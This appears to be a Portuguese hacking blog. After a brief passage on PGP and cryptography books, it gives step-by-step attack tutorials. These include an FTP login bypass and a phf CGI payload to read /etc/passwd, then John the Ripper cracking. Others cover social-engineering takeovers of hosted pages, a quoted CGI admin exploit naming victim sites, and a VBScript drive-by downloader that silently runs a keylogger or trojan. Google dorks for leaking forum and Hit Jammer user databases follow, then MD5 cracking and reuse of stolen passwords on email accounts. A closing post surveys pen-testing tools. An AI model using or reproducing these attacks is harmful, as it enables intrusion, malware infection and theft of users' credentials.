     O mesmo se diz referente a arquivos; e até seu disco rígido inteiro (HD) pode ser criptografado para que olhos estranhos não o vejam.
     Neste ponto você pensa: "Mas, alguém pode ler meu e-mail sem ser o destinatário???"
  
     PODE SIM...  seu e-mail passa por vários computadores antes de ir para o destino. Dentre eles, o do seu provedor (será que ele, ao ver um subject tipo: Festa de Aniversário , não vai ficar curioso e tirar uma cópia para ele???).
     
     Se você usa o e-mail do local onde trabalha...Saiba que a maioria das firmas guarda cópias de TODOS os e-mail que seus funcionários mandam (medo que estejam vendendo segredos ).
     Espero em breve colocar um tutorial, passo a passo, como utilizar o PGP, para mandar mensagens, proteger o HD, e suas funções mais úteis.
     Enquanto não arrumo tempo para o tutorial...Pegue este Manual do PGP...Está em formato .pdf (Adobe Acrobat Reader) e, apesar de falar sobre uma versão antiga, é muito bom. Mas o próprio PGP tem 3 manuais muito bons sobre criptografia e como usar a versão mais atual.

    Caso já tenha  o PGP e esteja usando...Pegue minha chave abaixo e mande-me um e-mail com suas sugestões, dúvidas, etc...

Livros sobre Criptografia

    Criptografia é uma ciência muito antiga. Mas não quer dizer que seja popular e fácil de encontrar livros e textos a respeito.

    De fato,a maioria dos textos que são possíveis de encontrar pela internet, são teses de mestrado e doutorado de pesquisadores ligados a matemática e segurança.
   Um bom livro com toda a matemática envolvida na criptografia pode ser achado para download em
"Handbook of Applied Cryptography" - excelente livro com todas as informações sobre a criptografia (em inglês) http://cacr.math.uwaterloo.ca/hac/
"Code Breakers" - este livro é sobre a história da criptografia, com todos os métodos e histórias sobre esta ciência. Pode ser encontrado em alguma livraria virtual(em inglês).
"Ritter's Crypto Glossary and Dictionary of Technical Cryptography" - um dicionário completo sobre os termos usados em criptografia. Para download ou consulta online.
   Estes são os principais e os que conheço. Na parte de links sobre criptografia, sempre tem algum lugar com textos diversos explicando separadamente algum método ou algoritmo criptográfico.
Postado por às Nenhum comentário:

quarta-feira, 26 de janeiro de 2011

=[ INVADINDO SITES ]=
Você hacker deve saber que hackear webpages é considerado lammer . As pessoas sempre podem checar log’s uma vez notificadas de hacking, e com certesa o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e você será condenado à alguns anos de prisão e terá de pagar uma quantia de dinheiro para sair. Então veja o que vi fazer nas pages..

=[ INVADINDO SITES POR FTP ]=
Primeiro, vá até o ms-dos….. digite ftp…. digite open, vai aparecer “para”….. digite o destino do site substituindo o www por ftp (ex.: ftp.ufla.br).
Ele vai pedir o Login, NÃO DIGITE NADA NESSE PONTO PELO AMOR DE DEUS….apenas pressione ENTER…..digite “quote user ftp”….digite “quote cwd-sys” ou então “quote cwd-root” e pressione ENTER….. por último “QUOTE PASS FTP” e ENTER…..PRONTINHO! vc está conectado ao site como um administrador…..agora abra o internet explorer e digite no url o ftp que vc inseriu no primeiro passo (aqui no caso ftp.ufla.br) e pressione enter….vc vai dar de cara com as pastas do site……

NÃO EXCLUA NADA, APENAS EXPLORE, NÃO MODIFIQUE NADA…VC CONSEGUE ATÉ COPIAR MAS NÃO MODIFIQUE…

=[ HACKEANDO FREE WEB PAGES ]=
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo… Consiga o MAXIMO de info que vc puder sobre ela.

Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password’z de volta.
Código:
(http://www.geocities.com/help/pass_form.html).



=[ HACKEANDO PAGES DE USUÁRIOS ]=
Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.
Pegando as password’s:
Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai…. segurança BEM LEVE! Não vou mentir… funciona melhor em sites SEM SEGURANÇA. hehehe

Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado “passwd”. Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:
http://www.vitima.com/cgi-bin/phf?Qa…%20/etc/passwd
OBS: se vc não souber o que colocar no lugar de “vitima.com”, SE MATE LAMMER!
Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.

Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.
Vc precisa examinar o arquivo de password’z e achar algo tipo assim:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)
Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.
Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:
john passwd -single
Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:
john pass.txt -single
Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.
Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas “john”, no diretório do programa, para obter uma lista de comandos.
Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.
Para concluir… se vc pegou a password e username, DIVIRTA-SE!!!

=[ HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO ]=
Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.
Exploiting Net Adminstration CGI (by Lopd Somer)
#######################################
Exploiting Net Administration Cgi’s
like nethosting.com
Written by:Lord Somer
Date:9/2/97
#######################################
Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:”Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?” O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.
Basicamente, a nethosting.com fez toda a sua administração via CGI’z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração… vc vai ver umas *****s como administração de FTP, e-mail, etc.
Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:
http://net-admin.nethosting.com/cgi-…om+ljad32432jl
Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.
Uma vez que vc tem o backdoor, DIVIRTA-SE!
Bom, a teoria básica desse tipo de exploit é que:
-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.
-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.
- Multiplas ///’z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.
Eu usei este método para hackear alguns lugares conhecidos:

-7thsphere.com
-sinnerz.com
-hawkee.com
-warez950.org
-lgn.com

E muitos outros sites desconhecidos.

=[ OUTRA MANEIRA DE SE HACKEAR USER PAGES ]=
Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.

=[ MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS ]=
Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password’z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.

=[ INVADINDO POR FTP ]=
1º PASSO – No DOS digite FTP;
2º PASSO – Eu aconselho a digitar “?” para ver so comandos do FTP;
3º PASSO – Digite “open”. Irá aparecer a mensagem “TO”;
4º PASSO – Escolha um servidor de FTP (ftp.mandic.com.br, ftp.sol.com.br, ftp.plugnet.com.br, etc.);
5º PASSO – Espere conectar e digite “quote cwd~root” ou “quote cwd~sys”;
6º PASSO – No PASSWORD coloque “quote pass ftp”;
7º PASSO – Você vai entrar no diretório home/root, dê um “cd/etc”;
8º PASSO – Pronto, você está no lugar certo, mas não se esqueça, as senhas são criptografadas, não adianta copiá-las, a não ser que tenha um programa para descriptografá-las.
Invasão via browser

Qualquer Home-Page que voce visita pode muito bem obter informacoes sobre você, como por
exemplo: Provedor, endereco IP, sistema operacional que esta usando, Browser que esta usando e
talvez o e-mail.
Mas você pode ficar anônimo é uma das coisas mais fáceis, mas não 100% seguro de que você
fique totalmente anônimo, mas mesmo assim, é melhor tentar hackear “invisivel” do que hackear na
cara dura… bom para você fazer isso existe o anonymizer, ele age como intermediario entre o seu
programa de navegação e os outros websites. Assim sendo, ele impede que o site vizitado tenha
acesso a qualquer tipo de informação sua.

Para você usar o serviço, você deve anteceder os URLs com os seguintes endereços do

Anonymizer:
Código:
http://www.anonymizer.com:8080/Se você quiser acessar a home-page da Mandic por exemplo, e não quiser que ela obtenha seus
dados, você deve digitar no seu navegador:
Código:
http://www.anonymizer.com:8080/Código:
http://www.mandic.com.brPronto desta forma você poderá mesmo usar aquelas senhas de sites pornográficos que você tinha
sem se preocupar tanto com a sua segurança.

OBSERVAÇÃO : O Anonymizer nao é totalmente seguro. Por isso não pense que usando o
Anonymizer você pode sair por aí entrando em tudo que é site fudendo com eles.

=[ OUTRO MODO DE INVADIR UM SITE ]=

Basta vc invadir a hospedagem do Site e colocar lá eu HTML ou SCRIP para PIXAR
Um opção para achar o IP do site e e em qual servidor de hospedagem que está, vc faz o seguinte no Prompt do MS-D.O.S

Digita o seguinte comando com o nome do site

C:\WINDOWS>ping www.xxxxxxx.xxx.xx

Após ter feito isso aparecerá um IP que vc poderá colacar ele no próprio Browser(Internet Explorer, Netsckpe e outros), no lugar do endereço vc digita diretamente o IP que apareceu aí vc achará quem está hospedando o Site!
Tente descobir com um Port-Scan, quais portas estão acessiveis e FORÇA BRUTA, nele…
Postado por às Nenhum comentário:

quinta-feira, 20 de janeiro de 2011

•••Auto-executavel em Um Site•••

•••Auto-executavel em Um Site•••

Esse Tutorial Vai Mostrar Como executar algum Programa quando a Pessoa entrar no site, vcs podem colocar um serve de algum trojan ou keylogger, para obter senhas

Bom vamos lá....esse codigo que irei posta é um auto-executavel....

Codigo

<title></title>
<head></head>
<body>
<script language="VBScript">

on error resume next



' due to how ajax works, the file MUST be within the same local domain
dl = "LINK DO PROGRAMA"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")

a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1

' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send

' Get temp directory and create our destination name
fname1="NOME DO PROGRAMA E A EXTENSÃO"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2

S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0



</script>
<head>
<title>[rox] || 404 Not Found</title>
</head><body>
<center><embed src="" pluginspage="" type="application/x-shockwave-flash" width="550" height="290"> </embed>

<!-- <script>location.href='http://google.com'</script> -->
</body>

</html> 
 
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
/* Código HTML encripitado em ****************. Para usar este código, mantenha estas linhas de referência*/
var Words = ""
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>


Explicando: O codigo acima esta em VBScript
Portanto Só funciona Para quem Usa Internet Explorer

Onde tem "LINK DO PROGRAMA" vc vai por o link do seu Keylogger ou KL, pode tbm outro trojan caso queira :D ....

Exemplo link do programa:

' due to how ajax works, the file MUST be within the same local domain
dl = "www. sitehospedeiro . com . br/kl.exe" <-- sem espaços

E onde tem o "NOME DO PROGRAMA E A EXTENSÃO" que dizer que é o final do link do programa...

Exemplo nome do programa e a extensão:

fname1="kl.exe"

Creditos: Hacker Bauru 
Postado por às 2 comentários:

Invasão de Foruns

Invasão de Foruns



Bem amigos nesse tutorial irei mostrar como hackear foruns, mas cuidado é só pra aprendizado:

coloque a seguite string no google ou em outro site de busca: "Powered By Elite Forum Version *.*"

vai aparecer um monte de sites, vou citar um por ex:
http://www.site.edu/DPS/eliteforum/

se aparecer algo depois do /eliteforum/ tipo,index.php? apague até o /eliteforum/ e em seguida acrescente: /data/users/userdb.dat
ficando assim:

http://www.site.edu/DPS/eliteforum/data/users/userdb.dat

você verá uma pagina com várias coisas que a principio parece nao entender nada mas o importante é saber reconheer o usuario e a senha que esta em MD5 , calme nao se assuste, mostrarei como quebrar o MD5 tambem.

ex: "vou encontrar o ususario e senha"
< #!USER!#><#!UNAME!#>mirel<#!ENDUNAME!#> <#!PWORD!#>ccbee73cd81c7f42405e1920409247ec

<#!ENDPWORD!#><#!DBID!#>0<#!ENDDBID!#><#!ENDUSER!#>

usuario: mibel
senha em MD5: ccbee73cd81c7f42405e1920409247ec

agora acesse o site :
http://www.milw0rm.com/cracker/insert.php
coloque o ccbee73cd81c7f42405e1920409247ec digite o codigo de segurança e escolha MD5. clique emsubmit e aguarde o site quebrar p MD5

o resultado da senha seguinte será : paris
então basta ir a index do forum e logar :

usuario: mibel
senha : paris



creditos :

hacker bauru..
Postado por às Nenhum comentário:

quarta-feira, 19 de janeiro de 2011

Roubando senhas de E-mail com o google


Mais uma vez o google se mostra uma arma incrivelmente potente para os hackers quando em conjunto com a ignorância de administradores de sites...
O Hit Jammer 1.0 eh um script para unix que permite a você gerenciar o trafego e modificar o site sem precisar utilizar HTML. É geralmente utilizado por aqueles sites "underground" que pagam pelas navegações, etc.
O autor do script já soltou um patch para correção dos bugs, mas muitos administradores nem se quer deram noticia disso.
Um bug critico no script permite que nós facilmente acessemos a área admin, podendo ver todos os nomes de usuários, email, e senha... :twisted:
Bom, chega de papo, vamos ao que interessa 8)
Vá ate o google (www.google.com) e digite no campo de busca "POWERED BY HIT JAMMER 1.0!" (sem aspas) vão aparecer vários sites, escolha sua vitima e mãos a obra!
Entre no site de sua escolha e quando entrar mude o link para:
Ex: www.trafficgold.com vai virar www.trafficgold.com/admin/admin.php
Pronto, se o site estiver vulnerável (o que é muito provável) vai aparecer os nomes de usuário, senha e e-mail!
Como muitos usuários sem muitas noções sobre segurança utilizam as mesmas senhas em vários lugares, vá ate o servidor de e-mail (aquele que aparece depois do "@") e procure pelo link para acessar o mail.
Copie a senha e o email, quando entrar, você pode pedir por senhas perdidas procurar pelo numero do CC, etc..
[Eu não me responsabilizo por nada]
Postado por às Nenhum comentário:

(Pen-test)Testes de penetração

O que pretendo discutir com os nossos colegas é quais são as ferramentas e métodos que utilizam para enumeração ,scanning e testes de vulnerabilidades em redes, .Tem muitos que acha que administrar uma rede é apenas fazer o pc ficar conectado na rede e cuidar para que ele fica funcionando, se seria isso era moleza
mais um administrador de rede tem que proteger a sua rede para impedir invasão e viros, tem empresa que contrata um adminstrador só para aquela função e se der alguma coisa errado tá ferrado, ela pode perde muito dinheiro e a culpa é do admistrador.

1.Penetration testing


Penetration-test é o método usado para testar e descobrir vulnerabilidades numa rede e a possibilidade de ver como estas podem ser exploradas ou corrigidas.
Para ser feito um teste de penetração são contratados profissionais (ou pessoas internas à rede) para explorar a rede, da mesma forma que um cracker faria e em seguida são entregues os resultados indicando todas as falhas encontradas e como corrigi-las.

Para se fazer um teste de penetração é necessário passar diversas fases, para as quais são utilizadas diversas ferramentas. As fases serão indicadas nos pontos seguintes.

1.1-Reconhecimento da rede


A enumeração consiste no reconhecimento da rede e dos sistemas atingíveis. Os resultados esperados são: nomes de domínios, nomes de servidores, informação do ISP, endereços IP envolvidos e também um mapa da rede. Inclui ainda informação de registos de domínios para os servidores.
Para fazer o reconhecimento da rede, podem ser utilizadas diversas ferramentas e técnicas, conforme o objectivo do ataque. Indico abaixo algumas ferramentas, que poderão ser usadas no reconhecimento.

•Nslookup – funciona em Windows e Linux. Serve para mapear endereços IP para um determinado domínio.

•Whois –Nos dá toda a informação sobre um domínio registado (entidade que registou, endereço físico, contactos, domain servers, etc)

•ARIN

•Dig – serve para perguntar a um servidor DNS informação acerca de outras coisas, por exemplo, a versão do name server que a empresa está a utilizar...

•Engenharia social

•Web site alvo

1.2-Scanning


Nesta fase de um teste de penetração é a identificação de portas abertas e serviços a correr, na máquina(s) ou rede alvo, chegando assim a enumeração de vulnerabilidades no alvo.

Também nesta fase do teste podemos incluir diversas ferramentas e tecnicas, conforme o objectivo do teste e a configuração da máquina/rede alvo. Ferramentas deste tipo foram analisadas no ponto 3 deste mesmo relatório.
As ferramentas mais utilizadas para fazer scanning, são:

•telnet –Serve para mostrar informação sobre uma aplicação ou serviço (versão, plataforma.

•nmap – port scanner

•hping2 – port scanner

•netcat – port scanner

•ping – testa conectividade IP

•traceroute –Ele conta os “hops” da rede, desde a máquina em que é executado até à máquina/sistema alvo.

•queso – OS fingerprinting.

1.3-Teste de vulnerabilidade


Os testes de vulnerabilidades consistem na determinação de que buracos de segurança e vulnerabilidades podem ser aplicadas à rede/máquina alvo. Quem efectuar o teste vai tentar identificar nas máquinas na rede alvo todas as portas abertas, sistemas operativos e aplicações a serem executadas; incluindo o sistema operativo, patches aplicados e service packs aplicados.

Nas etapas anteriores, são identificadas as máquinas que estão ligadas e que portas e serviços têm disponíveis.

Existe, na geral quatro categorias de vulnerabilidades que podem ser encontradas:

•Os bugs específicos do sistema operativo, exploits, vulnerabilidades e buracos de segurança

•As fraquezas no firewall e routers, entre diversas marcas

•A exploração de scripts de web server

•As partilhas e confianças exploráveis entre sistemas e ficheiros.

O scan de vulnerabilidades pode ser feito de várias formas, que indicarei nos pontos seguintes.

1.3.1-Ferramentas e Manuais


As análises das vulnerabilidades de um computador pode ser feita manualmente, com base na informação recolhida nos pontos anteriores. Ou seja, são percorridas as listas de vulnerabilidades existentes, em busca de alguma que possa existir para cada uma das aplicações instaladas na máquina.

1.3.2-Nessus


O Nessus é a melhor ferramenta de inventariação de vulnerabilidades com código fonte disponível.

Instalação

Esta ferramenta é constituida por duas partes: o cliente e o servidor, que podem ou não, ser instaladas em máquinas diferentes.
A instalação é bastante simples:

•executa-se a script de instalação
•adiciona-se um utilizador

Utilização

O Nessus tem de ter o servidor instalado numa máquina *IX, mas o cliente pode ser executado em Windows ou em *IX.
O cliente desta ferramenta, pode correr em modo gráfico ou em modo de comando. O modo de comando tem a vantagem de poder ser incluido em scripts, o modo gráfico tem a vantagem de ser facilmente seleccionável quais os testes de vulnerabilidade que são executados.

1.3.3-SARA-Security Auditor's research assistant


O SARA é um scanner de rede, que procura serviços e os analisa.
Esta ferramenta produz relatórios em diversos formatos: html, XML, interactivos e CSV, importável para folhas de cálculo.

Instalação

A instalação do SARA é muito simples: basta descomprimir o tgz, e executar ./configure, make, make install.

Relativamente à configuração, podem fazer-se algumas configurações específicas, mas deixando tudo o que vem por default, obtêm-se resultados interessantes.

Utilização

O SARA pode ser executado em três modos: interactivo (interface web), linha de comando, ou modo remoto.. No caso presente, optei pelo modo interactivo.

O modo remoto pode ser útil, no caso de se desejar ter o servidor de SARA numa determinada máquina e um cliente gráfico, na própria máquina.
Este modo tem algumas limitações: só é permitido um utilizador de cada vez, um teste não pode ser interrompido, o servidor não foi feito para ficar permanentemente à espera de pedidos, é preciso ter preocupações com a segurança.
Pode ser definido o tipo de “ataque” que é feito à máquina/rede em causa. Pode variar entre cinco níveis de severidade.

Comecei por fazer um scan de nível máximo, à página da FEUP e em seguida fiz um scan do mesmo nível ao www.portugalmail.pt.
No segundo caso obtive um resultado falso, dado que a vulnerabilidade indicada não está presente na máquina em questão. Ou seja, esta vulnerabilidade existe, de facto na versão indicada do software, mas neste caso concreto, já foi patched.


1.3.4-Comparação entre detectores de vulnerabilidades


A detecção manual de vulnerabilidades é, com certeza a que permite mais pormenor, mas é muito difícil de ser implementada com perfeição.
Relativamente às duas ferramentas utilizadas, o SARA é, sem dúvida, mais rápida, mas é também a menos eficiente. Além de apresentar resultados muito menos detalhados e não apresentar formas de resolução das vulnerabilidades (como o Nessus), apresenta falsos positivos.

Relativamente à forma de apresentação de resultados, o SARA é muito inferior. O servidor tem ainda problemas de funcionamento, no sentido que entre dois testes, se não for re-arrancado, não funciona corretamente.
Tem no entanto, uma funcionalidade interessante, que é ir guardando e apresentando em paralelo os resultados de testes anteriores. Esta característica pode ser interessante, do ponto de vista de armazenamento de informação sobre todo o parque de servidores de uma empresa, por exemplo.
Postado por às Nenhum comentário:
Assinar: Postagens (Atom)